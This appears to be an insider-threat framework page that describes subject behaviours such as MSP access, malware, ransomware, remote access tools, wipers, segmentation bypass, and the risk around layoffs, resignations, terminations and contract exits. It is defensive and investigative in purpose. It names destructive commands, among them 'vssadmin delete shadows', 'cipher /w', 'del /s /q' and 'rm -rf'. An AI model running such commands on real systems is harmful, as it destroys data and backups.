Cyber Deception, File Canary

An organization entrusts a Managed Service Provider (MSP) with administrative or operational access to its digital environment - typically for IT support, system maintenance, or development functions. This access is often persistent, privileged, and spans sensitive infrastructure or data environments.

The means is established when MSP personnel, including potential subjects, are permitted to authenticate into the client’s environment from systems or networks entirely outside the client's visibility or jurisdiction. These MSP endpoints may be unmanaged, unmonitored, or physically located in regions where customer organization's policies, incident response authority, or legal recourse do not apply.

This creates an unobservable access channel: the subject operates from infrastructure beyond the reach of the customer organization's logging, endpoint detection, or identity correlation. The organization is therefore unable to monitor or verify who accessed what, when, or from where—rendering all downstream actions unauditable by the customer organization's internal security teams, unless mirrored within the client-controlled environment.

The exposure can be compounded by the MSP’s internal controls (or lack thereof). Weak credential custody practices, shared administrative accounts, inadequate background checks, or poor workforce segmentation create conditions where privileged misuse or unauthorized access can occur without attribution or immediate detection. The subject does not require escalation—they begin with sanctioned access and operate under delegated trust, often without the constraints applied to internal staff.

This structural dependency - privileged access held externally, without enforceable oversight - creates the necessary conditions for an insider infringement to occur with low risk of interruption or accountability.

The subject deliberately or inadvertently introduces malicious software (commonly referred to as malware) into the organization’s environment. This may occur via manual execution, automated dropper delivery, browser‑based compromise, USB usage, or sideloading through legitimate processes. Malicious software includes trojans, keyloggers, ransomware, credential stealers, remote access tools (RATs), persistence frameworks, or other payloads designed to cause harm, exfiltrate data, degrade systems, or maintain unauthorized control.

Installation of malicious software represents a high-severity infringement, regardless of whether the subject's intent was deliberate or negligent. In some cases, malware introduction is the culmination of prior behavioral drift (e.g. installing unapproved tools or disabling security controls), while in others it may signal malicious preparation or active compromise.

This Section is distinct from general “Installing Unapproved Software”, which covers non‑malicious or policy-violating tools. Here, the software itself is malicious in purpose or impact, even if delivered under benign pretenses.

A subject may search for, or otherwise explore files on a Network Attached Storage (NAS) device to identify sensitive information.

A subject may search for or otherwise explore files on a Collaboration Platform (such as SharePoint, OneDrive, Confluence, etc) to identify sensitive or valuable information.

A subject attempts to identify security software on a target system by looking through the file system to identify relevant directories or files.

The subject deploys ransomware within the organization’s environment, resulting in the encryption, locking, or destructive alteration of organizational data, systems, or backups. Ransomware used by insiders may be obtained from public repositories, affiliate programs (e.g. RaaS platforms), or compiled independently using commodity builder kits. Unlike external actors who rely on phishing or remote exploitation, insiders often bypass perimeter controls by detonating ransomware from within trusted systems using local access.

Ransomware payloads are typically compiled as executables, occasionally obfuscated using packers or crypters to evade detection. Execution may be initiated via command-line, scheduled task, script wrapper, or automated loader. Encryption routines often target common file extensions recursively across accessible volumes, mapped drives, and cloud sync folders. In advanced deployments, the subject may disable volume shadow copies (vssadmin delete shadows) or stop backup agents (net stop) prior to detonation to increase impact.

In some insider scenarios, ransomware is executed selectively: targeting specific departments, shares, or systems, rather than broad detonation. This behavior may indicate intent to send a message, sabotage selectively, or avoid attribution. Payment demands may be issued internally, externally, or omitted entirely if disruption is the primary motive.

The subject deploys a Remote Access Tool (RAT): a software implant that provides covert, persistent remote control of an endpoint or server—enabling continued unauthorized access, monitoring, or post-employment re-entry. Unlike sanctioned remote administration platforms, RATs are deployed without organizational oversight and are often configured to obfuscate their presence, evade detection, or blend into legitimate activity.

RATs deployed by insiders may be off-the-shelf tools (e.g. njRAT, Quasar, Remcos), lightly modified open-source frameworks (e.g. Havoc, Pupy), or commercial-grade products repurposed for unsanctioned use (e.g. AnyDesk, TeamViewer in stealth mode). 

Functionality typically includes:

• Full GUI or shell access
• File system interaction
• Screenshot and webcam capture
• Credential harvesting
• Process and registry manipulation
• Optional keylogging and persistence modules

Deployment methods include manual installation, script-wrapped droppers, DLL side-loading, or execution via LOLBins (mshta, rundll32). Persistence is typically achieved through scheduled tasks, registry run keys, or disguised service installations. In some cases, the RAT may be configured to activate only during specific windows or respond to remote beacons, reducing exposure to detection.

The subject deploys destructive malware; software designed to irreversibly damage systems, erase data, or disrupt operational availability. Unlike ransomware, which encrypts files to extort payment, destructive malware is deployed with the explicit intent to delete, corrupt, or disable systems and assets without recovery. Its objective is disruption or sabotage, not necessarily for direct financial gain.

This behavior may include:

• Wiper malware (e.g. HermeticWiper, WhisperGate, ZeroCleare)
• Logic bombs or time-triggered deletion scripts
• Bootloader overwrite tools or UEFI tampering utilities
• Mass delete or format scripts (format, cipher /w, del /s /q, rm -rf)
• Data corruption utilities (e.g. file rewriters, header corruptors)
• Credential/system-wide lockout scripts (e.g. disabling accounts, resetting passwords en masse)

Insiders may deploy destructive malware as an act of retaliation (e.g. prior to departure), sabotage (e.g. to disrupt an investigation or competitor), or under coercion. Detonation may be manual or scheduled, and in some cases the malware is disguised as routine tooling to delay detection.

Destructive deployment is high-severity and often coincides with forensic tampering or precursor access based infringements (e.g. file enumeration or backup deletion).

A subject bypasses logical or physical network segmentation controls (such as VLANs, ACLs, security groups, or subnets) in order to obtain unauthorized access to systems, services, or data across trust boundaries. This preparation technique commonly manifests through deliberate configuration changes (e.g., modifying ACLs or VLAN assignments), covert tunneling (e.g., SSH, HTTPS reverse tunnels), rogue device introduction (e.g., unmanaged switches or dual-homed devices), or misuse of trusted services (e.g., remote access platforms or admin automation tools that bridge zones).

Such actions are often observable via first-time or anomalous cross-segment flows, management plane configuration logs, 802.1X/NAC anomalies, or long-lived encrypted outbound sessions. These techniques typically exploit privileged access, weak change control, or poor posture enforcement.

This behaviour may be motivated by a subject’s attempt to escalate access, stage data for exfiltration, evade oversight, or maintain persistence across environments. It is especially critical in environments with sensitive zoning, such as production-to-dev separations, cloud VPC peerings, or physically segmented OT/ICS networks.

Investigators should prioritize telemetry correlation across NetFlow/IP Flow Information Export (IPFIX), EDR, DHCP, and identity systems to attribute cross-zone traffic to known assets and subjects. Preserve infrastructure configuration snapshots and identify whether segmentation was circumvented by direct administrative action, covert bridging, or software-level tunnelling.

The subject is affected by an involuntary organizational decision to reduce headcount, commonly referred to as a workforce reduction, layoff, or redundancy. Unlike terminations for other reasons, workforce reduction typically affects multiple employees at once and is driven by budget constraints, restructuring, or strategic realignment.

A subject affected by workforce reduction may experience acute emotional responses (particularly resentment, betrayal, or perceived devaluation) which can develop into retaliatory or self-serving behaviors. These emotional states, when combined with continued access to internal systems, can motivate infringements.

Subjects impacted by workforce reductions may engage in infringements during the period between notification and final termination. When the workforce reduction is publicly known, subjects may further rationalize inappropriate actions as justified by circumstance or organizational failure. Investigators should consider the timing of the reduction announcement, the subject’s level of access, and any prior indicators of behavioral drift, before and during the offboarding window. Elevated risk is especially present where access revocation is delayed beyond a few hours after notification.

The subject initiates their voluntary departure from the organization, typically through formal resignation. While not inherently malicious, resignation marks a critical inflection point, particularly when paired with future employment at a competitor, ongoing interpersonal conflict, or dissatisfaction with organizational direction.

Subjects who resign may experience a shift in loyalty, a reduced sense of accountability, a weakened sense of confidentiality, or surface a previously held belief that organizational data is now personally justifiable to retain. These attitudes may lead to pre-exit infringement such as covert (or overt) data transfers to personal systems or accounts.

In many cases, resignation can introduce a false sense of finality or detachment, wherein the subject no longer adheres to internal policy boundaries. Risk is elevated during the notice period, especially in environments with weak offboarding processes.

The subject is involuntarily removed from the organization due to misconduct, performance failure, policy breach, or other cause-based grounds. Unlike workforce reductions (which typically involves a process and/or negotiation) terminations for cause are highly personal and often carry significant emotional charge, especially if the subject perceives the action as unjust, humiliating, or damaging to reputation or career prospects.

Subjects terminated for cause may exhibit high-risk behaviors during the pre-termination window (e.g., after being placed under investigation or on performance review) or immediately following notification. Even brief access persistence post-notification can present significant risk. The subject may attempt to delete evidence, exfiltrate data for leverage, disrupt systems, or stage retaliatory actions. The motivational blend of perceived injustice and loss of control often drives urgent, overt behavior with little regard for concealment.

Investigators should assess not only the subject’s final actions, but also the timeline of organizational awareness, specifically whether the subject had foreknowledge of the impending termination, and whether access controls were applied in parallel with disciplinary measures.

The subject departs the organization due to the planned or unplanned end of a temporary engagement  (typically as a contractor, consultant, vendor, or contingent worker). These non-renewals may lack the emotional intensity of involuntary terminations but introduce distinct insider threat risks tied to access posture, entitlement hygiene, and perceived ownership of deliverables.

Unlike full-time employees, contract-based personnel are frequently managed outside standard HR and identity governance systems. As a result, they often fall outside formal offboarding processes - retaining access to internal systems, repositories, or communication channels due to limited integration with core IT asset and access management workflows.

Separation timelines are commonly informal, unstructured, or delayed - particularly when procurement, business units, and security functions operate in silos. If the subject disagrees with the decision not to renew, or views their contributions as personally owned, data loss or intellectual property exfiltration may occur as a form of leverage or to support future portfolio use.

Investigators should recognize that contract-based relationships introduce a structurally distinct insider risk profile, particularly at time of exit. These subjects may exploit offboarding blind spots, reuse credentials, or transfer sensitive materials under the belief that they are exempt from internal policy enforcement. This hubris, combined with reduced visibility and limited organizational recourse, can enable undetected or unchallenged infringement.